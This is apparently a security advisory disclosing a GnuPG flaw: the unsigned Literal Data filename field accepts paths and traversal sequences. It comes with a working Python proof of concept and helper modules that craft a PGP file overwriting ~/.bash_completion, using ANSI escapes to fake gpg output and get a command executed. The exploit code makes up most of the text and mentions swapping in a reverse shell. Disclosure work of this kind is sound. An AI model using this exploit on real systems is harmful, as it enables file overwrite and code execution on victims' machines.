GnuPG Accepts Path Separators and Path Traversals in Literal Data "Filename" Field

GnuPG accepts arbitrary file paths in the unsigned Literal Data packet filename field and uses that value without sufficient sanitization.

Impact

In combination with tricking a user with ANSI formatted output that changes GnuPG output with deceptive apparent GnuPG logs, this can lead to creation or overwrite of any file on the system the user can write to. This commonly includes regularly executed scripts and programs leading to remote code execution (RCE).

Details

Literal Data parsing copies namelen bytes from the packet into pt->name without sanitizing or restricting directory separators or traversal sequences.

    pt->namelen = namelen;
    pt->is_partial = partial;
    if (pktlen) {
        for (i = 0; pktlen > 4 && i < namelen; pktlen--, i++)
            pt->name[i] = iobuf_get_noeof(inp);
    }

This data is then processed by get_output_file which performs no sanitization and treats the file name field as a file path.

To quote from the GnuPG man page:

Note also that unless a modern version 5 signature is used the embedded filename is not part of the signed data.

This makes attacks in certain scenarios more likely as an attacker might modify/insert this to more easily deceive an inattentive user.

Detailed steps to reproduce

Scenario

Procedure

from literal_data import LiteralDataEncoding, LiteralDataPacket
from packets import Packet, PacketType
from armor import ArmorSectionType, BEGIN, END, DASHES, crc24, standard_b64encode


encoding = LiteralDataEncoding.Text

ld_packet = LiteralDataPacket(
    encoding=encoding,
    file_name="/home/nine/.bash_completion", data=b"""
#gpg: WARNING: Message contains no signatures. Continue viewing [Y/n]?\necho pwned]2;
"""
)

packet = Packet(
    legacy=True,
    packet_type=PacketType.LiteralData,
    body=ld_packet,
)

data = bytes(packet)
header = f"{BEGIN}{ArmorSectionType.PGP_ARMORED_FILE.value}{DASHES}"
footer = f"{END}{ArmorSectionType.PGP_ARMORED_FILE.value}{DASHES}"

b64_data = standard_b64encode(data).decode("utf8")
lines = []
while len(b64_data) >= 64:
    lines.append(b64_data[:64])
    b64_data = b64_data[64:]
if b64_data:
    lines.append(b64_data)

checksum = crc24(data).to_bytes(length=3, byteorder="big")
b64_checksum = standard_b64encode(checksum).decode("utf8")

print(header)
print("Comment: open with `gpg --decrypt pts.enc && gpg pts.enc`" + "\n")
for line in lines:
    print(line)
print(f"={b64_checksum}")
print(footer)
$ gpg --decrypt pts.enc && gpg pts.enc
gpg: WARNING: Message contains no signatures. Continue viewing [Y/n]?

$ bash
pwned$

Note, that instead of echo pwned we could have set up a reverse shell.

Recommendations

Appendix

buffer.py

class Buffer:
    inner: bytes

    def __init__(self, inner: bytes = b""):
        self.inner = inner

    def __bytes__(self) -> bytes:
        return self.inner

    def __len__(self) -> int:
        return len(self.inner)

    def is_empty(self) -> bool:
        return len(self.inner) == 0

    def push_bytes(self, data: bytes):
        self.inner += bytes(data)

    def push_mpi(self, data: bytes, bits: int | None):
        if bits is None:
            size = len(data)
            pos = 0
            while data[pos] == 0:
                size -= 8
                pos += 1
            if data[pos] >= 0x80:
                pass
            elif data[pos] >= 0x40:
                size -= 1
            elif data[pos] >= 0x20:
                size -= 2
            elif data[pos] >= 0x10:
                size -= 3
            elif data[pos] >= 0x08:
                size -= 4
            elif data[pos] >= 0x04:
                size -= 5
            elif data[pos] >= 0x02:
                size -= 6
            elif data[pos] >= 0x01:
                size -= 7
        self.push_u16be(bits)
        self.push_bytes(data)

    def push_utf8(self, text: str):
        self.push_bytes(text.encode("utf8"))

    def push_int(self, value: int, count: int, byteorder: str = "big", signed: bool = False):
        self.push_bytes(int(value).to_bytes(count, byteorder=byteorder, signed=signed))

    def push_i8(self, value: int):
        self.push_int(value, 1, signed=True)

    def push_i16be(self, value: int):
        self.push_int(value, 2, byteorder = "big", signed=True)

    def push_i16le(self, value: int):
        self.push_int(value, 2, byteorder = "little", signed=True)

    def push_i32be(self, value: int):
        self.push_int(value, 4, byteorder = "big", signed=True)

    def push_i32le(self, value: int):
        self.push_int(value, 4, byteorder = "little", signed=True)

    def push_i64be(self, value: int):
        self.push_int(value, 8, byteorder = "big", signed=True)

    def push_i64le(self, value: int):
        self.push_int(value, 8, byteorder = "little", signed=True)

    def push_u8(self, value: int):
        self.push_int(value, 1, signed=False)

    def push_u16be(self, value: int):
        self.push_int(value, 2, byteorder = "big", signed=False)

    def push_u16le(self, value: int):
        self.push_int(value, 2, byteorder = "little", signed=False)

    def push_u32be(self, value: int):
        self.push_int(value, 4, byteorder = "big", signed=False)

    def push_u32le(self, value: int):
        self.push_int(value, 4, byteorder = "little", signed=False)

    def push_u64be(self, value: int):
        self.push_int(value, 8, byteorder = "big", signed=False)

    def push_u64le(self, value: int):
        self.push_int(value, 8, byteorder = "little", signed=False)

    def take_bytes(self, count: int) -> bytes:
        value = self.inner[:count]
        self.inner = self.inner[count:]
        return value

    def take_mpi(self) -> tuple[int, bytes]:
        bits = self.take_u16be()
        return (bits, self.take_bytes((bits + 7)//8))

    def take_utf8(self, count: int | None = None) -> str:
        text: str
        if count is None:
            count = self.inner.find(0)
            text = self.take_bytes(count)
            _null = self.take_u8()
        else:
            text = self.take_bytes(count)

        return text.decode("utf8")

    def take_int(self, count: int, byteorder: str = "big", signed: bool = False) -> int:
        return int.from_bytes(
            self.take_bytes(count),
            byteorder=byteorder,
            signed=signed,
        )

    def take_i8(self) -> int:
        return self.take_int(1, signed=True)

    def take_i16be(self) -> int:
        return self.take_int(2, byteorder="big", signed=True)

    def take_i16le(self) -> int:
        return self.take_int(2, byteorder="little", signed=True)

    def take_i32be(self) -> int:
        return self.take_int(4, byteorder="big", signed=True)

    def take_i32le(self) -> int:
        return self.take_int(4, byteorder="little", signed=True)

    def take_i64be(self) -> int:
        return self.take_int(8, byteorder="big", signed=True)

    def take_i64le(self) -> int:
        return self.take_int(8, byteorder="little", signed=True)

    def take_u8(self) -> int:
        return self.take_int(1, signed=False)

    def take_u16be(self) -> int:
        return self.take_int(2, byteorder="big", signed=False)

    def take_u16le(self) -> int:
        return self.take_int(2, byteorder="little", signed=False)

    def take_u32be(self) -> int:
        return self.take_int(4, byteorder="big", signed=False)

    def take_u32le(self) -> int:
        return self.take_int(4, byteorder="little", signed=False)

    def take_u64be(self) -> int:
        return self.take_int(8, byteorder="big", signed=False)

    def take_u64le(self) -> int:
        return self.take_int(8, byteorder="little", signed=False)

literal_data.py

from datetime import datetime
from enum import Enum

from buffer import Buffer

class LiteralDataEncoding(int, Enum):
    Binary = ord("b")
    UTF8 = ord("u")
    Text = ord("t")

class LiteralDataPacket:
    encoding: LiteralDataEncoding | None
    file_name: str
    metadata: int
    data: bytes

    def __init__(
        self,
        encoding: LiteralDataEncoding | None = None,
        file_name: str = "",
        metadata: int = 0,
        data: bytes = b"",
    ):
        self.encoding = encoding
        self.file_name = file_name
        self.metadata = metadata
        self.data = data

    def __str__(self) -> str:
        output = "\n"
        output += f"    encoding: {self.encoding},\n"
        output += f"    file_name: {repr(self.file_name)},\n"

        timestamp = datetime.fromtimestamp(self.metadata)
        output += f"    metadata: 0x{hex(self.metadata)} ({timestamp}),\n"
        output += f"    data({len(self.data)}): {self.data.hex()},\n"
        return output

    def __bytes__(self) -> bytes:
        buffer = Buffer()
        buffer.push_u8(self.encoding)
        buffer.push_u8(len(self.file_name))
        buffer.push_utf8(self.file_name)
        buffer.push_u32be(self.metadata)
        buffer.push_bytes(self.data)

        return bytes(buffer)

packets.py

from base64 import b64decode, b64encode
from enum import Enum
from sys import argv

from buffer import Buffer
from literal_data import LiteralDataEncoding, LiteralDataPacket


class PacketType(int, Enum):
    PublicKeyEncryptedSessionKey = 1
    Signature = 2
    SymmetricKeyEncryptedSessionKey = 3
    OnePassSignature = 4
    SecretKey = 5
    PublicKey = 6
    SecretSubkey = 7
    CompressedData = 8
    SymmetricallyEncryptedData = 9
    Marker = 10
    LiteralData = 11
    Trust = 12
    UserID = 13
    PublicSubkey = 14

    UserAttribute = 17
    SymmetricallyEncryptedAndIntegrityProtectedData = 18
    ModificationDetectionCode = 19
    Padding = 21


class Packet:
    legacy: bool
    packet_type: PacketType | None
    body: LiteralDataPacket | bytes

    def __init__(
        self,
        legacy: bool = False,
        packet_type: PacketType | None = None,
        body: LiteralDataPacket | bytes = b""
    ):
        self.legacy = legacy
        self.packet_type = packet_type
        self.body = body

    def __str__(self) -> str:
        prefix = "Legacy" if self.legacy else ""
        return f"{prefix}{self.packet_type}Packet({self.body})"

    def __bytes__(self) -> bytes:
        buffer = Buffer()
        raw_body = bytes(self.body)
        length = len(raw_body)

        if self.legacy:
            length_type = 0

            if length <= 0xff:
                length_type = 0
            elif length <= 0xffff:
                length_type = 1
            elif length <= 0xffff_ffff:
                length_type = 2
            else:
                length_type = 3

            buffer.push_u8(0x80 + (self.packet_type.value << 2) + length_type)

            match length_type:
                case 0:
                    buffer.push_u8(length)
                case 1:
                    buffer.push_u16be(length)
                case 2:
                    buffer.push_u32be(length)
                case _:
                    raise Exception("Not implemented")
        else:
            buffer.push_u8(0xc0 + self.packet_type.value)

            if length < 192:
                buffer.push_u8(length)
            elif length < 8383:
                length -= 192
                msb = (length >> 8) + 192
                lsb = length & 0xff
                buffer.push_u8(msb)
                buffer.push_u8(lsb)

        buffer.push_bytes(raw_body)
        return bytes(buffer)

    def from_buffer(self, buffer: Buffer):
        octed = buffer.take_u8()
        if octed >= 0xc0:
            self.legacy = False
            self.packet_type = PacketType(octed & 0x3f)
        elif octed >= 0x80:
            self.legacy = True
            self.packet_type = PacketType((octed & 0x3f) >> 2)
        else:
            raise Exception(f"Invalid Packet ID: {octed}")

        length = 0
        if self.legacy:
            match octed & 0x03:
                case 0:
                    length = buffer.take_u8()
                case 1:
                    length = buffer.take_u16be()
                case 2:
                    length = buffer.take_u32be()
                case _:
                    raise Exception(f"Indeterminate legacy length is not implemented")
        else:
            first = buffer.take_u8()
            if first < 192:
                length = first
            elif first < 224:
                msb = first - 192
                lsb = buffer.take_u8() + 192
                length = (msb << 8) + lsb
            elif first == 255:
                length = buffer.take_u32be()
            else:
                raise Exception(f"Partial body length is not implemented")

        data = buffer.take_bytes(length)
        self.body = data


class Packets:
    packets: list[Packet]

    def __init__(self, packets: list[Packet] = []):
        self.packets = packets

    def __bytes__(self) -> bytes:
        output = b""
        for packet in self.packets:
            output += bytes(packet)
        return output

    def from_buffer(self, buffer: Buffer):
        while not buffer.is_empty():
            packet = Packet()
            packet.from_buffer(buffer)
            self.packets.append(packet)

    def from_bytes(self, data: bytes):
        self.from_buffer(Buffer(data))

armor.py

from base64 import b64decode, standard_b64encode
from enum import Enum

from packets import Packets


def crc24(data: bytes, init: int = 0xB704CE, poly: int = 0x1864CFB) -> int:
    result = init
    for byte in data:
        result ^= byte << 16
        for bit in range(8):
            result <<= 1
            if (result & 0x1000000):
                result ^= poly
    return result & 0xFFFFFF

class ArmorHeaderTag(str, Enum):
    Version = "Version"
    Comment = "Comment"
    MessageID = "MessageID"
    Hash = "Hash"
    Charset = "Charset"
    NotDashEscaped = "NotDashEscaped"


class ArmorHeader:
    tag: ArmorHeaderTag
    value: str

    def __init__(self, line: str):
        parts = line.split(":", 1)
        if len(parts) == 2:
            self.tag = ArmorHeaderTag(parts[0])
            self.value = parts[1].strip()
        else:
            raise Exception(f"Invalid Header: At least one colon (':') expected")

    def __str__(self) -> str:
        return f"{self.tag.value}: {self.value}"


class ArmorSectionType(str, Enum):
    PGP_MESSAGE = "PGP MESSAGE"
    PGP_PUBLIC_KEY_BLOCK = "PGP PUBLIC KEY BLOCK"
    PGP_PRIVATE_KEY_BLOCK = "PGP PRIVATE KEY BLOCK"
    PGP_SIGNATURE = "PGP SIGNATURE"
    PGP_SIGNED_MESSAGE = "PGP SIGNED MESSAGE"
    PGP_ARMORED_FILE = "PGP ARMORED FILE"

    def is_binary(self) -> bool:
        match self:
            case ArmorSectionType.PGP_PUBLIC_KEY_BLOCK | ArmorSectionType.PGP_PRIVATE_KEY_BLOCK | ArmorSectionType.PGP_SIGNATURE:
                return True
            case _:
                return False


class ArmorSection:
    section_type: ArmorSectionType
    headers: list[ArmorHeader]
    message: str
    data: list[bytes]

    def __init__(self, section_type: ArmorSectionType):
        self.section_type = section_type
        self.headers = []
        self.message = ""
        self.data = []

    def __str__(self) -> str:
        if self.is_binary():
            message = "Binary {\n"
            for data in self.data:
                message += f"    ({len(data)}): {data.hex()},\n"
            message += "}"
            return message
        else:
            message = "Cleartext {\n"
            message += "    headers: {\n"
            for header in self.headers:
                message += f"        {header},\n"
            message += "    },\n"
            message += f"    message: {repr(self.message)},\n"
            message += "}"
            return message

    def finalise(self):
        if self.is_binary() and self.message != "":
            data = b64decode(self.message)
            self.data.append(data)

    def is_binary(self) -> bool:
        return self.section_type.is_binary()

    def create_fake(
        self,
        out_path: str,
        signature_packets: Packets,
        fake_message: str = "<insert your message here>",
    ):
        with open(out_path, "w") as fake_output:
            # Note the extra `-` at the end:
            fake_output.write("-----BEGIN PGP SIGNED MESSAGE------\n")
            for header in self.headers:
                fake_output.write(f"{header}\n")
            fake_output.write(f"\n{fake_message}\n")
            fake_output.write("-----BEGIN PGP SIGNATURE-----\n\n")

            data = bytes(signature_packets)

            b64_data = standard_b64encode(data).decode("utf8")
            while len(b64_data) >= 64:
                fake_output.write(f"{b64_data[:64]}\n")
                b64_data = b64_data[64:]
            fake_output.write(f"{b64_data[:64]}\n")

            checksum = crc24(data).to_bytes(length = 3, byteorder = "big")
            b64_checksum = standard_b64encode(checksum).decode("utf8")
            fake_output.write(f"={b64_checksum}\n")
            fake_output.write("-----END PGP SIGNATURE-----\n")


class ArmorExpect(int, Enum):
    Preamble = 1
    Header = 2
    Body = 3


DASHES = 5 * "-"
DASH_ESCAPE = "- "
BEGIN = f"{DASHES}BEGIN "
END = f"{DASHES}END "


class ArmorParser:
    expect: ArmorExpect
    dash_escaping: bool
    section: ArmorSection | None
    sections: list[ArmorSection]

    def __init__(self):
        self.expect = ArmorExpect.Preamble
        self.dash_escaping = True
        self.section = None
        self.sections = []

    def push_line(self, line: str):
        line = line.rstrip()

        match self.expect:
            case ArmorExpect.Preamble:
                if line.startswith(BEGIN) and line.endswith(DASHES):
                    section_type = ArmorSectionType(line[len(BEGIN):-len(DASHES)].strip())
                    self.section = ArmorSection(section_type)
                    self.expect = ArmorExpect.Header

            case ArmorExpect.Header:
                if line == "":
                    self.expect = ArmorExpect.Body
                else:
                    header = ArmorHeader(line)
                    self.section.headers.append(header)
                    match header.tag:
                        case ArmorHeaderTag.Hash:
                            pass
                        case ArmorHeaderTag.NotDashEscaped:
                            self.dash_escaping = False
                        case _:
                            pass

            case ArmorExpect.Body:
                opening = self.section.section_type

                if line.startswith(END) and line.endswith(DASHES):
                    closing = ArmorSectionType(line[len(END):-len(DASHES)].strip())
                    if opening != closing:
                        raise Exception(f"Mismatch between opening ({opening}) and closing ({closing}) header line")

                    self.section.finalise()
                    self.sections.append(self.section)
                    self.section = None
                    self.expect = ArmorExpect.Preamble

                elif line.startswith(BEGIN) and line.endswith(DASHES):
                    section_type = ArmorSectionType(line[len(BEGIN):-len(DASHES)].strip())
                    if section_type == ArmorSectionType.PGP_SIGNATURE:
                        self.section.finalise()
                        self.sections.append(self.section)

                        self.section = ArmorSection(section_type)
                        self.expect = ArmorExpect.Header
                    elif opening.is_binary() or self.dash_escaping:
                        raise Exception(f"Unexpected opening header line '{section_type}'")
                    else:
                        #print(f"Ignore opening header line '{section_type}'")
                        self.section.message += f"{line}\r\n"

                elif opening.is_binary():
                    if line.startswith("="):
                        line = line[1:]

                    self.section.message += line

                    if line.find("=") >= 0:
                        data = b64decode(self.section.message)
                        self.section.data.append(data)
                        self.section.message = ""

                else:
                    if self.dash_escaping and line.startswith(DASH_ESCAPE):
                        line = line[len(DASH_ESCAPE):]
                    if self.section.message:
                        self.section.message += "\r\n"
                    self.section.message += line


class Armor:
    sections: list[ArmorSection]

    def __init__(self, sections: list[ArmorSection] = []):
        self.sections = sections

    def from_file(self, file_name: str):
        with open(file_name, "r") as file:
            parser = ArmorParser()

            for line in file.readlines():
                parser.push_line(line)

            self.sections.extend(parser.sections)